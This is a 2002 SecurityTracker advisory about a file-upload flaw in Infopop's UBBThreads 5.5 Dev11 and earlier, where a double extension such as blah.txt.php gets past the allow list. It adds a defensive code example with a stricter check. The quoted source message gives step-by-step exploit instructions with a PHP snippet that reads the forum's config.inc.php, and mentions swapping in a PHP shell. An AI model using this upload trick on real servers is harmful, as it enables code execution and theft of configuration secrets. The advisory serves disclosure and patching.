SecurityTracker.com
Category:  Application (Generic)  >  UBBThreads
Vendors:  Infopop
UBBThreads Bulletin Board Application Lets Remote Users With Accounts on the Bulletin Board Upload Files With Prohibited Extensions, Including PHP Scripts Which Can Subsequently Be Executed on the System
Date:  Jan 31 2002
Impact:  Execution of arbitrary code via network, Host/resource access via network
Fix Available:  Yes   Exploit Included:  Yes   Vendor Confirmed:  Yes  
Version(s): 5.5 Dev11 and prior
Description:  A vulnerability was reported in Infopop's UBBThreads message board software. A remote user with a valid account on the bulletin board can upload a file with a file extension that should be blocked. PHP scripts can be uploaded and executed.

It is reported that a remote user with a valid account on the bulletin board application can upload certain file types that are intended to be blocked from uploading (e.g., .php, .asp, .js, .vbs, .sht, .htm). This is reportedly because of a logic flaw in the code that checks for file extensions to be allowed and not allowed. A remote user can add a permitted file extension (e.g., .zip, .txt, .gif, .jpg, .jpeg, .bmp) before the true extension to circumvent the blocking mechanism.

A remote user could upload a PHP file and then execute that PHP script on the server.

A demonstration exploit example is provided in the Source Message.

Impact:  A remote user with valid access to a bulletin board account can upload files with file extensions that should be prohibited. This can include PHP files that can then be executed on the server.
Solution:  The vendor has released a fixed version (5.5).

Vendor URL:  www.infopop.com/products/ubbthreads/index.html
Cause:  Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (NT), Windows (2000)
Reported By:  Root Extractor <condor@phreaker.net>
Message History:   None.
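
The extension-check flaw described above, shown beside a stricter check. This is an added example, not UBBThreads source code and not part of the original report: the flawed function is an assumed reconstruction (a match on an allowed extension anywhere in the name), both function names are hypothetical, and the allow list is the `$config['allowfiles']` value quoted in the Source Message.

```php
<?php
// Added example, not vendor code. Allow list copied from the advisory's
// config.inc.php excerpt; function names are hypothetical.
$allowfiles = ".zip,.txt,.gif,.jpg,.jpeg,.bmp";

// Assumed form of the flaw: the name passes if an allowed extension
// appears anywhere in it, so "blah.txt.php" validates.
function flawed_is_allowed(string $name, string $allowfiles): bool
{
    foreach (explode(",", $allowfiles) as $ext) {
        if (stripos($name, $ext) !== false) {
            return true;
        }
    }
    return false;
}

// Stricter check: only the final extension counts, and it must match
// an allow-list entry exactly (case-insensitive).
function strict_is_allowed(string $name, string $allowfiles): bool
{
    // Drop any client-supplied path component before inspecting the name.
    $base = basename(str_replace("\\", "/", $name));
    $dot = strrpos($base, ".");
    if ($dot === false || $dot === 0) {
        return false; // no extension at all, or a dotfile such as ".htaccess"
    }
    $ext = strtolower(substr($base, $dot));
    return in_array($ext, explode(",", $allowfiles), true);
}

// Constructed sample file names.
$samples = ["photo.jpg", "notes.TXT", "blah.txt.php", "blah.php",
            "archive.zip.PHP", ".htaccess", "report"];
foreach ($samples as $name) {
    printf("%-16s flawed=%-5s strict=%s\n", $name,
        var_export(flawed_is_allowed($name, $allowfiles), true),
        var_export(strict_is_allowed($name, $allowfiles), true));
}
```

The flawed check accepts `blah.txt.php` and `archive.zip.PHP`; the strict check rejects both and still accepts `photo.jpg` and `notes.TXT`. An extension check is one layer only: storing uploads where the web server will not execute scripts limits the damage if the check is bypassed.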


 Source Message Contents

Date:  30 Jan 2002 22:12:17 -0000
From:  Root Extractor <condor@phreaker.net>
Subject:  [ WWWThreads, UBBThreads ] Security Hole in upload system

 



[ WWWThreads, UBBThreads ] Security Hole in upload system

Author: RootExtractor, CompuMe
condor@phreaker.net, compume2000@hotmail.com

I.   Details 
II.  Vulnerable ver's
III. Example, Xploit
IV.  Solution

Details :

..: config.inc.php :..
------------------------- snip ------------------------------

// $config['excludefiles'] = ".php,.asp,.js,.vbs,.sht,.htm";
   $config['allowfiles'] = ".zip,.txt,.gif,.jpg,.jpeg,.bmp";

------------------------- snip ------------------------------

 
that files that were not listed in the allow files could 
still be uploaded. Seems you checked the extension 
but if someone added an allowable extension first 
before the bogus extension the file would upload.

vulnerable :
WWWThreads and UBBThreads 5.5 Dev11 and prior

not vulnerable : 
UBBThreads 5.5

Example : 
you allow the upload of .txt,.jpg,.bmp,.zip 
all files that don't have those extensions should not 
be uploaded 
However if somebody changes the name of the file to 
blah.txt.php the file will validate and upload......huh !

Xploit :
1) make new file $ touch blah.txt.php
2) edit it       $ vi blah.txt.php (in this step, write a php 
code, for example)

	            <?php
	            	$readfile = join("", file("../config.inc.php"));
	          	print $readfile;
	            ?>

3) save & upload it
4) visit your blah file, now you can see a config file 
of your victim forum
5) i'm replaced readfile code by php shell file


Solution :
visit infopop.com and download ubbthreads 5.5
http://www.infopop.com/


Copyright 2002 recm security team
http://hop.to/condor

 



Copyright 2002, SecurityGlobal.net LLC